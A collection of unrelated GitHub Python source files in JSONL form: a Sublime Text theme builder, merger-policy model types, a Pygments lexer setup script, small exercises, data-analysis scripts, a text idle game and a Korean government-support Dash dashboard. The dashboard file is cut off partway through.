+{"seq_id":"35725371312","text":"# -*- coding: utf-8 -*-\n\n\"\"\"See class `Theme`\n\n\"\"\"\n\nimport copy, os, shutil\n\nfrom string import Template\n\nfrom .color import Color\n\nclass Theme():\n \"\"\"A class for creating a Sublime Text theme.\"\"\"\n\n def __init__(self, name, icons_directory=None, theme_template_directory=None, theme_templates=None):\n \"\"\"Theme constructor.\"\"\"\n\n self.name = name\n\n # Default some properties based on name\n if theme_template_directory is None:\n theme_template_directory = theme_dir(self.name)\n\n if icons_directory is None:\n icons_directory = icons_dir(self.name)\n\n if theme_templates is None:\n theme_templates = basic_theme_templates(self.name)\n\n self.icons_directory = icons_directory\n self.theme_template_directory = theme_template_directory\n self.theme_templates = theme_templates\n\n self.options = {\n \"ThemeName\": self.name,\n }\n\n def set_iconset(self, name):\n \"\"\"Changes the theme's iconset\"\"\"\n\n self.icons_directory = icons_dir(name)\n\n def export(self, directory, package, opts=None):\n \"\"\"Exports the Theme to a file.\"\"\"\n\n if opts is None:\n opts = copy.copy(self.options)\n\n opts[\"Package\"] = package\n\n # Copy icons\n target_icons_directory = os.path.abspath(directory + os.sep + \"icons\" + os.sep)\n if os.access(target_icons_directory, os.F_OK):\n shutil.rmtree(target_icons_directory)\n shutil.copytree(self.icons_directory, target_icons_directory)\n opts[\"IconsDirectory\"] = target_icons_directory[target_icons_directory.index(package):].replace(\"\\\\\", \"/\")\n\n print(opts[\"IconsDirectory\"])\n print(self.icons_directory)\n\n # Create an alternate version of the options data where all Colors are formatted\n # as array strings instead of hex-strings as expected by .sublime-theme files\n sublime_theme_options = copy.copy(opts)\n for key in sublime_theme_options:\n if isinstance(sublime_theme_options[key], Color):\n sublime_theme_options[key] = sublime_theme_options[key].rgba_array_string()\n\n # Process theme_templates\n for template in self.theme_templates:\n\n current_options = opts\n key = template\n # Our stupid way of detecting whether or not we should use array strings for colors\n if template[0:2] == \"[]\":\n template = template[2:]\n current_options = sublime_theme_options\n\n template_file = os.path.abspath(self.theme_template_directory + os.sep + template)\n target_file = os.path.abspath(directory + os.sep + self.theme_templates[key])\n file = open(template_file, 'r')\n template = Template(file.read())\n file.close()\n content = template.substitute(current_options)\n file = open(target_file, 'w')\n file.write(content)\n file.close()\n\ndef theme_dir(name):\n \"\"\"Returns the standard theme template directory.\"\"\"\n\n return os.path.abspath(os.path.dirname(os.path.realpath(__file__)) + os.sep + os.path.pardir + os.sep + \"theme_templates\" + os.sep + name + os.sep)\n\ndef icons_dir(name):\n \"\"\"Returns the standard icon-sets directory.\"\"\"\n\n return os.path.abspath(os.path.dirname(os.path.realpath(__file__)) + os.sep + os.path.pardir + os.sep + \"iconsets\" + os.sep + name + os.sep)\n\ndef basic_theme_templates(name, target_name=None):\n \"\"\"Returns the standard theme template array.\"\"\"\n\n if target_name is None:\n target_name = name\n return {\n # TODO: Remove the need for the \"[]\" prepended by moving the\n # Widget files to color schemes?\n \"[]\" + name + \".sublime-theme-template\": \"..\" + os.sep + target_name + \".sublime-theme\",\n name + \"-Widget.sublime-settings-template\": \"Widget - \" + target_name + \".sublime-settings\",\n name + \"-Widget.stTheme-template\": \"Widget - \" + target_name + \".stTheme\"\n }\n","repo_name":"lytedev/lyte-theme","sub_path":"src/theme_builder/theme.py","file_name":"theme.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"21"} +{"seq_id":"26670656286","text":"from dataclasses import dataclass\nfrom enum import Enum\n\n\nclass MergerPolicies(Enum):\n \"\"\"\n Defines the available merger policies in the models.\n \"\"\"\n\n Strict = \"Strict\"\n \"\"\"\n The AA authorises only takeovers that, at the moment in which they are reviewed, are expected to increase total \n welfare.\n \"\"\"\n Intermediate_late_takeover_prohibited = \"Intermediate (late takeover prohibited)\"\n \"\"\"The AA blocks late takeovers, but is more lenient with early takeovers.\"\"\"\n Intermediate_late_takeover_allowed = \"Intermediate (late takeover allowed)\"\n \"\"\"The AA authorises late takeovers, but is stricter with early takeovers.\"\"\"\n Laissez_faire = \"Laissez-faire\"\n \"\"\"The intervention threshold of the AA is so high that any acquisition would be allowed.\"\"\"\n\n def abbreviation(self) -> str:\n \"\"\"\n Generates a string containing the abbreviation of the current merger policy.\n\n Returns\n -------\n str\n Abbreviation of the current merger policy.\n \"\"\"\n if self is MergerPolicies.Intermediate_late_takeover_prohibited:\n return \"$I^P$\"\n if self is MergerPolicies.Intermediate_late_takeover_allowed:\n return \"$I^A$\"\n return f\"${self.value[0]}$\"\n\n def __str__(self) -> str:\n \"\"\"\n Returns the string representation of the current merger policy.\n\n Returns\n -------\n str\n String representation of the current merger policy.\n \"\"\"\n return self.value\n\n @staticmethod\n def legend() -> str:\n \"\"\"\n Generates a string containing the legend of the possible merger policies.\n\n Returns\n -------\n str\n Containing the legend for the merger policies.\n \"\"\"\n return (\n f\"{MergerPolicies.Strict.abbreviation()}: Strict\\n\"\n f\"{MergerPolicies.Intermediate_late_takeover_prohibited.abbreviation()}:\"\n f\" Intermediate (late takeover prohibited)\\n\"\n f\"{MergerPolicies.Intermediate_late_takeover_allowed.abbreviation()}:\"\n f\" Intermediate (late takeover allowed)\\n\"\n f\"{MergerPolicies.Laissez_faire.abbreviation()}: Laissez-faire\"\n )\n\n\nclass Takeover(Enum):\n \"\"\"\n Defines the available options for a takeover of the start-up by the incumbent.\n \"\"\"\n\n No = \"No bid\"\n \"\"\"The incumbent does not bid for the start-up.\"\"\"\n Separating = \"Separating bid\"\n \"\"\"The incumbent offers a low takeover price targeting only the credit-rationed start-ups.\"\"\"\n Pooling = \"Pooling bid\"\n \"\"\"\n The incumbent offers a high takeover price such that a start-up would always accept, irrespective of the amount of \n its own assets.\n \"\"\"\n\n def abbreviation(self) -> str:\n \"\"\"\n Generates a string containing the abbreviation of the current takeover option.\n\n Returns\n -------\n str\n Abbreviation of the current takeover option.\n \"\"\"\n return f\"${self.value[0]}$\"\n\n def __str__(self) -> str:\n \"\"\"\n Returns the string representation of the current takeover option.\n\n Returns\n -------\n str\n String representation of the current takeover option.\n \"\"\"\n\n return self.value\n\n @staticmethod\n def legend() -> str:\n \"\"\"\n Generates a string containing the legend of the possible takeover options.\n\n Returns\n -------\n str\n Containing the legend for the takeover options.\n \"\"\"\n return (\n f\"{Takeover.No.abbreviation()}: No bid by the incumbent\\n\"\n f\"{Takeover.Separating.abbreviation()}: Separating bid by the incumbent\\n\"\n f\"{Takeover.Pooling.abbreviation()}: Pooling bid by the incumbent\"\n )\n\n\n@dataclass(frozen=True)\nclass ThresholdItem:\n \"\"\"\n Threshold item containing the name (string representation) and the value (threshold express in float value).\n \"\"\"\n\n name: str\n value: float\n include: bool = False\n \"\"\"Marks this ThresholdItem with high priority.\"\"\"\n\n def __eq__(self, other):\n return self.value == other.value\n\n def __lt__(self, other):\n return self.value < other.value\n\n\n@dataclass(frozen=True)\nclass Outcome:\n \"\"\"\n Contains the bare-bones information about the outcome of a Fumagalli_Motta_Tarantino_2020.Models.Base.MergerPolicy.\n \"\"\"\n\n early_bidding_type: Takeover\n late_bidding_type: Takeover\n development_attempt: bool\n development_outcome: bool\n early_takeover: bool\n late_takeover: bool\n\n\n@dataclass(frozen=True)\nclass Summary(Outcome):\n \"\"\"\n Summary of Fumagalli_Motta_Tarantino_2020.Models.Base.MergerPolicy.\n \"\"\"\n\n set_policy: MergerPolicies\n credit_rationed: bool\n\n\n@dataclass(frozen=True)\nclass OptimalMergerPolicySummary(Summary):\n \"\"\"\n Summary of Fumagalli_Motta_Tarantino_2020.Models.Base.OptimalMergerPolicy.\n \"\"\"\n\n optimal_policy: MergerPolicies\n\n\nclass PossibleOutcomes(Enum):\n \"\"\"\n Contains the outcomes in the models.\n \"\"\"\n\n def __init__(\n self,\n early_bidding_type: Takeover,\n early_takeover: bool,\n development_attempt: bool,\n development_outcome: bool,\n late_bidding_type: Takeover,\n late_takeover: bool,\n ):\n self.outcome = Outcome(\n early_bidding_type=early_bidding_type,\n early_takeover=early_takeover,\n development_attempt=development_attempt,\n development_outcome=development_outcome,\n late_bidding_type=late_bidding_type,\n late_takeover=late_takeover,\n )\n\n NoTakeoversSuccessfulDevelopment = (\n Takeover.No,\n False,\n True,\n True,\n Takeover.No,\n False,\n )\n \"\"\"Neither an early or late takeover occurs and the development is successful.\"\"\"\n\n NoTakeoversFailedDevelopment = (Takeover.No, False, True, False, Takeover.No, False)\n \"\"\"Neither an early or late takeover occurs and the development is unsuccessful.\"\"\"\n\n NoTakeoversDevelopmentNotAttempted = (\n Takeover.No,\n False,\n False,\n False,\n Takeover.No,\n False,\n )\n \"\"\"Neither an early or late takeover occurs and the development is not attempted.\"\"\"\n\n RejectedEarlySeparatingSuccessfulDevelopment = (\n Takeover.Separating,\n False,\n True,\n True,\n Takeover.No,\n False,\n )\n \"\"\"An early separating bid is rejected by the start-up and the development is successful.\"\"\"\n\n RejectedEarlySeparatingUnsuccessfulDevelopment = (\n Takeover.Separating,\n False,\n True,\n False,\n Takeover.No,\n False,\n )\n \"\"\"An early separating bid is rejected by the start-up and the development is unsuccessful.\"\"\"\n\n EarlySeparatingSuccessfulDevelopment = (\n Takeover.Separating,\n True,\n True,\n True,\n Takeover.No,\n False,\n )\n \"\"\"An early separating bid is accepted by the start-up and the development is successful.\"\"\"\n\n EarlySeparatingUnsuccessfulDevelopment = (\n Takeover.Separating,\n True,\n True,\n False,\n Takeover.No,\n False,\n )\n \"\"\"An early separating bid is accepted by the start-up and the development is unsuccessful.\"\"\"\n\n EarlySeparatingDevelopmentNotAttempted = (\n Takeover.Separating,\n True,\n False,\n False,\n Takeover.No,\n False,\n )\n \"\"\"An early separating bid is accepted by the start-up and the development is not attempted.\"\"\"\n\n EarlyPoolingSuccessfulDevelopment = (\n Takeover.Pooling,\n True,\n True,\n True,\n Takeover.No,\n False,\n )\n \"\"\"An early pooling bid is accepted by the start-up and the development is successful.\"\"\"\n\n EarlyPoolingUnsuccessfulDevelopment = (\n Takeover.Pooling,\n True,\n True,\n False,\n Takeover.No,\n False,\n )\n \"\"\"An early pooling bid is accepted by the start-up and the development is unsuccessful.\"\"\"\n\n EarlyPoolingDevelopmentNotAttempted = (\n Takeover.Pooling,\n True,\n False,\n False,\n Takeover.No,\n False,\n )\n \"\"\"An early pooling bid is accepted by the start-up and the development is not attempted.\"\"\"\n\n LatePooling = (\n Takeover.No,\n False,\n True,\n True,\n Takeover.Pooling,\n True,\n )\n \"\"\"A late pooling bid is accepted by the start-up after a successful development.\"\"\"\n\n LatePoolingRejectedEarlySeparating = (\n Takeover.Separating,\n False,\n True,\n True,\n Takeover.Pooling,\n True,\n )\n \"\"\"\n An early separating bid is rejected by the start-up and the development is successful with subsequent late takeover.\n \"\"\"\n","repo_name":"manuelbieri/Fumagalli_2020","sub_path":"Fumagalli_Motta_Tarantino_2020/Models/Types.py","file_name":"Types.py","file_ext":"py","file_size_in_byte":8902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42266827148","text":"from setuptools import setup, find_packages\n\nentry_points = '''\n[pygments.lexers]\nбарвінок=pygments_periwinkle_lexer:PeriwinkleLexer\n'''\n\nsetup(\n name='pygments-periwinkle-lexer',\n version='0.0.10',\n description='Лексер для Барвінку.',\n long_description=\"Пакет для Pygments, який додає підсвічування синтаксису для мови програмування Барвінок\",\n author='Федуняк Роман',\n author_email='fedynuak.roma@gmail.com',\n url='https://github.com/periwinkle-lang',\n packages=find_packages(),\n entry_points=entry_points,\n install_requires=[\n 'Pygments>=2.14.0'\n ],\n license='MIT License',\n classifiers=[\n \"License :: OSI Approved :: MIT License\",\n \"Natural Language :: Ukrainian\",\n \"Programming Language :: Python :: 3 :: Only\",\n \"Environment :: Plugins\",\n ],\n)\n","repo_name":"periwinkle-lang/pygments-periwinkle-lexer","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16469140642","text":"#======================================================\n# В лотерее 100 билетов. Из них 2 выигрышных.\n# - Какова вероятность того, что 2 приобретенных билета\n# окажутся выигрышными?\n#=======================================================\n\nnum_tickets = 100\nnum_win_tickets = 2\n\n# вероятность приобретения первого выигрышного билета\np_first_win_ticket = num_win_tickets / num_tickets\n\n# вероятность приобретения второго выигрышного билета после приобретения первого\np_second_win_ticket = (num_win_tickets - 1) / (num_tickets - 1)\n\n# общая вероятность того, что два приобретенных билета окажутся выигрышными\np_both_win_tickets = p_first_win_ticket * p_second_win_ticket\n\nprint(\"Вероятность получить два выигрышных билета:\",\n p_both_win_tickets, \"или ~\", round(p_both_win_tickets*100, 2), \"%\\n\")","repo_name":"enigmacat/Probability_theory_and_mathematical_statistics","sub_path":"HomeWork_01/homework04.py","file_name":"homework04.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5163670594","text":"import json\nfrom os import listdir\nfrom os.path import isdir, isfile, join\n\nwith open(\"config.json\", \"r\") as f:\n data = json.load(f)\n\nuser_profile_features = data[\"user profile\"]\nuser_tweet_features = data[\"user tweet\"]\n\ndef user_profile_process(path):\n list_of_prof_features = {}\n mypath = path\n files = [f for f in listdir(mypath) if isfile(join(mypath, f))]\n for file in files:\n print(file)\n with open(join(mypath,file), 'r', encoding=\"utf8\") as f:\n temp = json.load(f)\n new_dict = {x: v for x, v in temp.items() if x in user_profile_features}\n list_of_prof_features[str(file)] = new_dict\n\n json_object = json.dumps(list_of_prof_features, indent=4)\n \n \n with open(\"Base Model's Data\\\\Logistic Regression with Particle Swarm Optimization\\\\prof.json\", \"w\", encoding=\"utf8\") as outfile:\n outfile.write(json_object)\n return 0\n\n\n\ndef user_tweet_process(path):\n size = 1000\n list_of_user_tweet_features = {}\n mypath = path\n dirs = [f for f in listdir(mypath) if isdir(join(mypath, f))]\n for dir in dirs:\n list_of_tweet = []\n path = join(mypath, dir)\n onlyfiles = [f for f in listdir(path) if isfile(join(path, f))]\n counter = 0\n for file in onlyfiles:\n with open(join(path,file), 'r', encoding=\"utf8\") as f:\n temp = json.load(f)\n new_dict = {x: v for x, v in temp.items() if x in user_tweet_features}\n list_of_tweet.append(new_dict)\n counter += 1\n if counter == 1000:\n break\n print(f\"{str(dir)} is done!\")\n list_of_user_tweet_features[str(dir)] = list_of_tweet\n\n json_object = json.dumps(list_of_user_tweet_features, indent=4)\n \n \n with open(\"Base Model's Data\\\\Logistic Regression with Particle Swarm Optimization\\\\tweet_1000.json\", \"w\", encoding=\"utf8\") as outfile:\n outfile.write(json_object)\n\n return 0 \n\ndef user_mention_process(path):\n list_of_user_mentions = {}\n mypath = path\n files = [f for f in listdir(mypath) if isfile(join(mypath, f))]\n for file in files:\n with open(join(mypath,file), 'r', encoding=\"utf8\") as f:\n temp = json.load(f)\n new_dict = {x: v for x, v in temp.items()}\n list_of_user_mentions[str(file)] = new_dict\n\n json_object = json.dumps(list_of_user_mentions, indent=4)\n with open(\"Base Model's Data\\\\Logistic Regression with Particle Swarm Optimization\\\\mention.json\", \"w\", encoding=\"utf8\") as outfile:\n outfile.write(json_object)\n return 0\n\n\n\n\n\n\nuser_tweet_process(\"Labeled Data\\\\Users Tweets\")\n# user_profile_process(\"Labeled Data\\\\Twitter Profiles Json\")\n# user_mention_process(\"Labeled Data\\\\Users Mentions\")","repo_name":"Mohammad-Moradi/MultiCred","sub_path":"Data_Preprocessing.py","file_name":"Data_Preprocessing.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"75213436853","text":"import os\nimport yaml\nimport pickle\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nfrom utils import data_loader, display\n\nif __name__ == '__main__':\n tqdm.pandas()\n display.configure_pandas()\n display.configure_logging()\n # configure the working directory to the project root path\n with open(\"../config.yaml\", \"r\", encoding=\"utf8\") as f:\n conf = yaml.load(f, Loader=yaml.FullLoader)\n os.chdir(conf[\"project_path\"])\n\n rest_events = pd.read_parquet('data/rest/rest_events.parquet')\n\n # 统计每天休息事件发生的次数\n plate_day_counts = rest_events.groupby('license').apply(lambda x: x.groupby('day').size())\n plate_day_counts = plate_day_counts.unstack(level=-1).fillna(0)\n plate_times = plate_day_counts.mean(axis=1).round().astype(int)\n resting_times = (plate_times.value_counts() / plate_times.size).sort_index()\n print(resting_times)\n # Fig 1: 考察开始休息时间的分布\n fig = plt.figure()\n ax = fig.add_subplot(1, 1, 1)\n # Data preparation\n rest_events['time_of_day'] = rest_events['start_time'].dt.hour + rest_events['start_time'].dt.minute / 60\n ce = data_loader.load_ce(version='v5_30min')\n common = data_loader.load_trajectory_od_intersection()\n ce = ce.loc[ce['licence'].isin(common)].reset_index(drop=True)\n ce['time_of_day'] = ce['start_charging'].dt.hour + ce['start_charging'].dt.minute / 60\n # Plot\n ce.plot(y='time_of_day', kind='hist', bins=24 * 12, ax=ax, secondary_y=False, histtype='step', legend=True,\n density=True, label='Charging events')\n rest_events['time_of_day'].plot(kind='hist', bins=24 * 12, ax=ax, density=True, legend=True,\n grid=False, histtype='step', label='Resting events')\n ax.set_xticks(range(0, 25, 2))\n ax.margins(x=0)\n ax.set_title('Distribution of rest events and charging events')\n ax.set_xlabel('Time of day/ hour')\n ax.set_ylabel('Probability', )\n plt.show()\n # Resting event start time distribution\n count, division = np.histogram(rest_events['time_of_day'], bins=24 * 60)\n print(count)\n\n # Figure 2: 考察休息时长的变化\n # Data preparation\n rest_events['rest_length'] = rest_events['duration'] / 3600\n rest_events['hour'] = rest_events['start_time'].dt.hour\n rest_events['interval_in_hour'] = rest_events['start_time'].dt.minute // 30\n rest_dur = rest_events.groupby(['hour', ])['rest_length'].mean()\n # Plot\n fig = plt.figure()\n ax = fig.add_subplot(1, 1, 1)\n rest_dur.plot(style='.-', ax=ax, grid=True)\n ax.set_xticks(range(0, 24, 2))\n ax.margins(x=0)\n ax.set_title('Rest length in time of day')\n ax.set_xlabel('time of day/hour')\n ax.set_ylabel('rest length')\n plt.show()\n print(rest_events.groupby(['hour', ])['rest_length'].mean())\n\n with open(conf['mobility']['resting'], 'wb') as f:\n pickle.dump({'times': resting_times, 'distribution': count, 'duration': rest_dur}, f)\n","repo_name":"easysam/electric-taxi-mobility","sub_path":"s2_mobility/rest_pattern.py","file_name":"rest_pattern.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17546267922","text":"import configparser, time, replit, keyboard, math, json\n# box1: [money,time,currentprice,timeleft,amount bought]\nconfig = configparser.ConfigParser()\nchoice = input(\"load or start new\")\nif choice == \"load\":\n name = input(\"what is your save called\")\n name = name+\".txt\"\n print(\"loaded\")\n config.read(name)\n print(\"loaded save\")\nelif choice == \"start new\":\n name = input(\"name your save\")\n name = name+\".txt\"\n config[\"save\"] = {\"box1\": [1,1,2,1,1],\"box1price\": 2, \"box2\": [10,5,20,5,0], \"box2price\": 20, \"box3\": [100,25,200,25,0], \"box3price\": 200, \"box4\": [1000,125,2000,125,0], \"box4price\": 2000, \"box5\": [10000,625,20000,0], \"box5price\": 20000, \"money\": 0}\n with open(name, 'w') as configfile: config.write(configfile)\n\nsave = config[\"save\"]\nwhile True:\n replit.clear()\n box1 = json.loads(config.get(\"save\",\"box1\"))\n box2 = save[\"box2\"]\n box3 = save[\"box3\"]\n box4 = save[\"box4\"]\n box5 = save[\"box5\"]\n box1price = save[\"box1price\"]\n box2price = save[\"box2price\"]\n box3price = save[\"box3price\"]\n box4price = save[\"box4price\"]\n box5price = save[\"box5price\"]\n money = save[\"money\"]\n print(\"you have \"+str(money))\n print(box1[2])\n print(\"box1 gives \"+str(int(box1[0])*int(box1[4]))+\" in \"+str(box1[1])+\" its current price is \"+str(box1[2])+\" and there are \"+str(box1[4]))\n print(\"the current price of a box1 upgrade is \"+str(box1price))\n print(\"to open shop press s\")\n try:\n if keyboard.is_pressed('s'):\n print('Shop Opening')\n print(\"the current price of a box1 upgrade is \"+str(box1price))\n upgrade = int(input(\"give the number of what you would like to upgrade or hit 0 to skip\"))\n if upgrade == 1:\n choice = input(\"upgrade speed(s) or money(m)\")\n if choice == s:\n box1[4]+=1\n money-=box1price\n box1price*=1.5\n box1price = math.ceil(box1price)\n elif choice == m:\n if box1[1] == 0.1:\n print(\"maximum speed already reached\")\n else:\n box1[4]+=1\n money-=box1price\n box1price*=1.5\n box1price = math.ceil(box1price)\n else:\n pass\n except:\n pass\n save[\"box1\"] = box1\n save[\"box2\"] = box2\n save[\"box3\"] = box3\n save[\"box4\"] = box4\n save[\"box5\"] = box5\n save[\"box1price\"] = box1price\n save[\"box2price\"] = box2price\n save[\"box3price\"] = box3price\n save[\"box4price\"] = box4price\n save[\"box5price\"] = box5price\n save[\"money\"] = money\n with open(name, 'w') as configfile: config.write(configfile)\n time.sleep(1)","repo_name":"Will-Harmer/Idle-Game-text-based","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17530025704","text":"#!/usr/bin/python3\ndef uniq_add(my_list=[]):\n if my_list is None:\n return (None)\n seen = []\n result = 0\n for i in my_list:\n if i not in seen:\n result += i\n if i not in seen:\n seen.append(i)\n return (result)\n","repo_name":"davidknoppers/holbertonschool-higher_level_programming","sub_path":"0x04-python-more_data_structures/2-uniq_add.py","file_name":"2-uniq_add.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74094591732","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport pandas as pd\nimport json\nimport urllib.request\nimport plotly.express as px\nfrom dash.dependencies import Input, Output\nfrom datetime import datetime\n\n# get datas\nurl = 'https://www.amcharts.com/lib/4/geodata/json/southKoreaHigh.json'\nhdr = {'User-Agent': 'Mozilla/5.0'}\nreq = urllib.request.Request(url, headers=hdr)\nwith urllib.request.urlopen(req) as response:\n country_json = json.load(response)\n\n# initialize datas\ncountries = {'전체': 'All', '서울': 'Seoul', '부산': 'Busan', '대구': 'Daegu', '인천': 'Incheon', '광주': 'Gwangju',\n '대전': 'Daejeon', '울산': 'Ulsan', '세종': 'Sejong', '경기': 'Gyeonggi', '강원': 'Gangwon',\n '충북': 'North Chungcheong', '충남': 'South Chungcheong', '전북': 'North Jeolla',\n '전남': 'South Jeolla', '경북': 'North Gyeongsang', '경남': 'South Gyeongsang', '제주': 'Jeju'}\npie_charts = {\n 'fields': {'name': '지원 분야', 'key': '지원분야대', 'id': ['금융', '기술', '인력', '수출', '내수', '창업', '경영', '제도', '동반성장'],\n 'select': ['금융', '기술', '인력', '수출', '내수', '창업', '경영', '제도', '동반성장']},\n 'categoies': {'name': '업종', 'key': '업종',\n 'id': ['01~03', '05~08', '10~34', '35', '36~39', '41~42', '45~47', '49~52', '55~56', '58~63', '64~66', '68',\n '70~73', '74~76', '84', '85', '86~87', '90~91', '94~96', '97~98', '99'],\n 'select': ['농업, 임업 및 어업', '광업', '제조업', '전기, 가스, 증기 및 공기 조절 공급업',\n '수도, 하수 및 폐기물 처리, 원료 재생업', '건설업', '도매 및 소매업', '운수 및 창고업', '숙박 및 음식점업',\n '정보통신업', '금융 및 보험업', '부동산업', '전문, 과학 및 기술 서비스업', '사업시설 관리, 사업 지원 및 임대 서비스업',\n '공공 행정, 국방 및 사회보장 행정', '교육 서비스업', '보건업 및 사회복지 서비스업', '예술, 스포츠 및 여가관련 서비스업',\n '협회 및 단체, 수리 및 기타 개인 서비스업', '가구 내 고용활동 및 달리 분류되지 않은 자가 소비 생산활동', '국제 및 외국기관']},\n 'targets': {'name': '기업 형태', 'key': '기업형태', 'id': ['중소기업', '중견기업', '소상공인', '전통시장', '1인기업', '창업기업', '예비창업자'],\n 'select': ['중소기업', '중견기업', '소상공인', '전통시장', '1인기업', '창업기업', '예비창업자']}\n}\nINITIAL_CHART = 'fields'\nTODAY = datetime(2020, 3, 27) # temporary date -> datetime.today()\n\n\ndef get_pie_chart(country, pie_df):\n # draw pie chart graph and return\n fig_pie = px.pie(pie_df, values='count', names='id', hover_data=['avg_inquiry'], hover_name='name',\n labels={'id': '분류', 'name': pie_charts[chart]['name'], 'count': '지원사업 개수', 'avg_inquiry': '평균 조회수'})\n fig_pie.update_traces(textposition='inside')\n return fig_pie\n\n\ndef get_scatter_chart(country, scatter_df):\n # draw scatter chart graph and return\n fig_scatter = px.scatter(scatter_df, x='등록일자', y='조회수', color='접수기관_담당부서', hover_data=['평균조회수', scatter_df.index],\n hover_name='제목', labels={'평균조회수': '하루평균조회수'})\n fig_scatter.update_layout(clickmode='event+select')\n return fig_scatter\n\n\ndef selected_data_box(data_indexs):\n # draw selected datas in selected-data-box when datas are selected in scatter graph\n return html.Ul([html.Li([html.P(projects.loc[i, '접수기관_담당부서']),\n html.H6(projects.loc[i, '제목'][:13] + '...'),\n html.Div([html.Span(projects.loc[i, '내용'])]),\n html.Div([html.Span(projects.loc[i, '지원기간'])])]) for i in data_indexs],\n id='selected-data-box')\n\n\n# data preprocessing\ndf = pd.read_csv('file/bizinfodata2.csv', encoding='utf-8')\nprojects = pd.DataFrame(\n df, columns=['제목', '내용', '지역', '지원분야대', '지원기간', '기업형태', '업종', '조회수', '등록일자', '접수기관_담당부서'])\nprojects['등록일자'] = projects['등록일자'].str[:10]\nprojects['내용'] = projects['내용'].str.replace('

', '').str.replace( # remove and replace html tags\n ' ', ' ').str.replace('&', '&').str.replace('

', '').str.replace('?', ' ').str[:20] + '...'\n# to extract local dataframe, because str.len() == 50 contains all locals\nprojects_coun = projects[projects['지역'].str.len() != 50].copy()\ncountry_projects = {}\nfor country in countries:\n data = projects_coun.loc[projects_coun['지역'].str.contains(country)]\n country_projects[countries[country]] = {'name': country, 'data': data}\n\n\n# draw geoJson\ncountry_data = {'location': [], 'name': [], 'projects': []}\nfor country in country_projects:\n country_data['location'].append(country)\n country_data['name'].append(country_projects[country]['name'])\n country_data['projects'].append(len(country_projects[country]['data']))\n\ncountry_df = pd.DataFrame(country_data)\nfig_geo = px.choropleth(country_df, geojson=country_json, locations='location', color='projects',\n color_continuous_scale=\"Viridis\", hover_name='name',\n featureidkey='properties.name', projection=\"mercator\",\n labels={'location': 'id', 'name': '지역 이름', 'projects': '지원사업 개수'})\n\nfig_geo.update_geos(fitbounds=\"locations\", visible=False)\nfig_geo.update_layout(\n margin={\"r\": 0, \"t\": 0, \"l\": 0, \"b\": 0}, clickmode='event+select')\n\n\n# draw pie chart\ncountry_projects['All'] = {'name': '전체', 'data': projects}\npie_projects = {}\nfor country in countries:\n # get country data\n pie_data = {}\n data = country_projects[countries[country]]['data']\n for chart in pie_charts:\n # get value data\n pie_df = []\n for name, select in zip(pie_charts[chart]['id'], pie_charts[chart]['select']):\n select_data = data[data[pie_charts[chart]\n ['key']].str.contains(select)]\n length = len(select_data)\n if length == 0:\n continue\n select_data = {'id': name, 'name': select, 'count': length,\n 'avg_inquiry': sum(select_data['조회수']) // length}\n pie_df.append(select_data)\n pie_df = pd.DataFrame(pie_df)\n pie_data[chart] = pie_df\n pie_projects[country] = pie_data\n\n\n# draw scatter chart\nscatter_projects = {}\nfor country in countries:\n # get country data\n data = country_projects[countries[country]]['data'].copy()\n temp_time = data['등록일자'].str.split('-')\n for i in data.index:\n # convert 'YYYY-MM-DD' to datetime(YYYY, MM, DD)\n d = temp_time[i]\n t = datetime(int(d[0]), int(d[1]), int(d[2]))\n temp_time[i] = data.loc[i, '조회수'] // (TODAY - t).days\n data['평균조회수'] = temp_time\n scatter_projects[country] = data\n\n\n# run dash\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\n# app layout\napp.layout = html.Div([html.Header(),\n html.Main([html.Div([html.H1(\"Bizbot 현재 지원사업\")], id='title'),\n html.Div([html.Div([html.H5('지역별 정부지원사업'),\n dcc.Graph(id='korea-map', figure=fig_geo)]),\n html.Div([html.Div([html.P(id='pie-chart-country'),\n html.H5(id='pie-chart-value', className='chart-text-right-part')], className='chart-text'),\n html.Div([\n dcc.Dropdown(id='pie-labels', options=[{'label': pie_charts[i]['name'], 'value': i}\n for i in pie_data], value=INITIAL_CHART,\n style={'width': '55%', 'margin-top': '10px', 'margin-left': '10px'}),\n dcc.Graph(id='pie-chart')], style={'border': '1px solid #f9f9f9', 'width': '500px'})])], id='first-part'),\n\n html.Div([html.Div([html.P(id='wordcloud-chart-country'),\n html.H5('정부지원사업 워드 클라우드', className='chart-text-right-part')], className='chart-text'),\n html.Div([html.Img(id='wordcloud')], id='wordcloud-part')],\n id='second-part'),\n\n\n html.Div([html.Div([html.P(id='scatter-chart-country'),\n html.H5('정부지원사업 산점도', className='chart-text-right-part')], className='chart-text', id='scatter-part-text'),\n dcc.Graph(\n id='scatter-chart'),\n html.Div([html.Div([\n html.P(\n 'Selection Data'),\n html.H5('산점도에서 선택한 데이터가 보여집니다.', className='chart-text-right-part')], className='chart-text'),\n html.Div(id='selected-data')], id='scatter-selected-box')], id='third-part')\n ]),\n html.Footer()])\n\n\n# callback functions\n@app.callback(\n # get country data and pie chart value and deliver to pie chart, wordcloud and scatter\n [Output('pie-chart-country', 'children'),\n Output('pie-chart-value', 'children'),\n Output('pie-chart', 'figure'),\n Output('wordcloud-chart-country', 'children'),\n Output('wordcloud', 'src'),\n Output('scatter-chart-country', 'children'),\n 